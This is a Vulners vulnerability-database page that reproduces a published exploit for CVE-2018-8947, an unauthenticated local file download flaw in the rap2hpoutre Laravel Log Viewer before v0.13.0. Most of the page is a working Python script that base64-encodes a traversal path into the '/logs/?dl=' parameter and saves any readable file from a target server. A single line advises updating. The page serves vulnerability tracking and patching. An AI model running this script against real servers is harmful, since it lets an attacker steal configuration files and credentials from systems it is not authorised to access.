Vulners
Lucene search
Laravel Log Viewer < 0.13.0 - Local File Download
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | Laravel Log Viewer < 0.13.0 - Local File Download Vulnerability | 23 Mar 201800:00 | – | zdt |
 | CVE-2018-8947 | 25 Mar 201816:29 | – | attackerkb |
 | rap2hpoutre Laravel Log Viewer Security Bypass Vulnerability | 27 Mar 201800:00 | – | cnvd |
 | CVE-2018-8947 | 25 Mar 201816:00 | – | cve |
 | CVE-2018-8947 | 25 Mar 201816:00 | – | cvelist |
 | Laravel Log Viewer 0.13.0 - Local File Download | 26 Mar 201800:00 | – | exploitpack |
 | Plaintext Storage of Sensitive Information in Laravel Log Viewer before v0.13.0 | 13 May 202201:53 | – | github |
 | CVE-2018-8947 | 25 Mar 201816:29 | – | nvd |
 | GHSA-63QJ-P8GH-5XXX Plaintext Storage of Sensitive Information in Laravel Log Viewer before v0.13.0 | 13 May 202201:53 | – | osv |
 | Laravel Log Viewer Local File Download | 26 Mar 201800:00 | – | packetstorm |
10
# Exploit Title: Laravel log viewer by rap2hpoutre local file download (LFD)
# Date: 23/02/2018
# Exploit Author: Haboob Team
# Software Link: https://github.com/rap2hpoutre/laravel-log-viewer/tree/v0.11.1
# Version: v0.12.0 and below
# CVE : CVE-2018-8947
1. Description
Unauthorized user can access Laravel log viewer by rap2hpoutre and use download function to download any file with laravel permission, by base64 encode the wanted file.
2. Proof of Concept
#After providing the url of the vulnerable laravel log viewer by rap2hpoutre (with / in the end or you can edit it yourself), and the file wanted including "../" the script will create a folder and save the downloaded file there
import os
import base64
from urllib2 import urlopen, URLError, HTTPError
import argparse
import cookielib
parser = argparse.ArgumentParser(description='_0_ Laravel 0Day _0_')
parser.add_argument("-u", action="store", dest="url", help="Target URL", required=True)
parser.add_argument("-f", action="store", dest="file", help="Target File", required=True)
args = parser.parse_args()
url = str(args.url).strip()+"/logs/?dl="
final_file= args.file
if not os.path.exists("./0Grats0"):
os.makedirs("./0Grats0")
word = str(args.file).split('/')
word1= "./0Grats0/"+word[-1]
finalee=url+base64.b64encode(final_file)
try:
f = urlopen(finalee)
with open(word1, "wb") as local_file:
local_file.write(f.read())
except HTTPError, e:
print "HTTP Error:", e.code, finalee
except URLError, e:
print "URL Error:", e.reason, finalee
3. Solution:
Update to version v0.13.0
https://github.com/rap2hpoutre/laravel-log-viewer/releases/tag/v0.13.0Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Mar 2018 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 25
CVSS 37.5
EPSS0.16169